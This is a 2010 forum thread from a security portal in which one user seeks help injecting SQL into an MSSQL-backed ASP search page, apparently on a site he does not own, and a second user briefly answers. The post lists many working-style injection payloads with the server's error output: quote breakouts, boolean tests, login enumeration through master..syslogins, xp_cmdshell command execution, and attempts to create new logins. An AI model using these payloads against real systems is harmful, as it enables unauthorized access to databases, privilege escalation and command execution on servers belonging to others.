Waraxe IT Security Portal
Login or Register
June 17, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 50
Members: 0
Total: 50
Full disclosure
SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version
Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Local information disclosure in apport and systemd-coredump
Stored XSS via File Upload - adaptcmsv3.0.3
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Authenticated File Upload to RCE - adaptcmsv3.0.3
Stored XSS in "Description" Functionality - cubecartv6.5.9
Multiple Vulnerabilities in SAP GuiXT Scripting
CVE-2024-47081: Netrc credential leak in PSF requests library
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Mssql Injection?
Post new topicReply to topic View previous topic :: View next topic
Mssql Injection?
PostPosted: Mon Jun 28, 2010 6:11 pm Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128





Hi..;I m not abel to do something here Cuz it give "No permission" Each time I inject sometime..Damn, Maybe you can help me..I will explain more.

Here is the vuln URL..


Code:
http://www.URL.com/think/search.asp


I think It should be like that..

Code:
<form action="http://www.URL.com/think/search.asp" method="POST">
<input name="search_keyword" type="text" value="vsat">
<input type="submit" value="Inject !">


Look at all thes request and all their error given please..

Code:
vsat

work!

Code:
vsat'
vsat'/*
vsat')/*
vsat"/*
vsat"--


SQL Error!..

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/think/search.asp, line 91


Euh It work here..And it give a normal page as "vsat"..
Code:
vsat'--




But I tried with AND/OR/UNION/GROUP BY/ORDER BY/HAVING.. and it didnt work..It give the same SQL error

Code:
vsat' OR 1=1--
vsat' AND 1=1--
vsat' having 1=1--


I will post here what they are all injections that worked well, But it give a normal page as "vsat" nothing else..

Code:
vsat'--
vsat' IF (1=1) SELECT 'true' ELSE SELECT 'false'--
vsat' if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0--
vsat' SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC--
vsat' SELECT CHAR(0x66)--
vsat' SELECT 0x5045--
vsat' SELECT 0x50 + 0x45--


I tried many many functions..But they give "No permission ..."

Code:
vsat' exec master..xp_cmdshell 'dir'--


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

/think/search.asp, line 364



Code:
vsat' CREATE LOGIN JohnDoe WITH PASSWORD = 'somepassword'--
vsat' RECONFIGURE;--
vsat' CREATE USER WindowsGroup FROM LOGIN WindowsGroup--


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this action.

/think/search.asp, line 364



SO any answers or help or explanation please share anything with us..
View user's profile Send private message Visit poster's website
PostPosted: Wed Sep 01, 2010 1:23 am Reply with quote
niailuo
Beginner
Beginner
Joined: Aug 31, 2010
Posts: 2




you know,you can use exec.master..xp_cmdshell only at the time when you have the SA permission..
maybe it's a db_owner OR public permission. isn't it ?
Okay .hope you can add me ,and my ICQ:613592918.
I'm so sorry ,i can't speak English very well as I'm a Chinese..
View user's profile Send private message
Mssql Injection?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.024 Seconds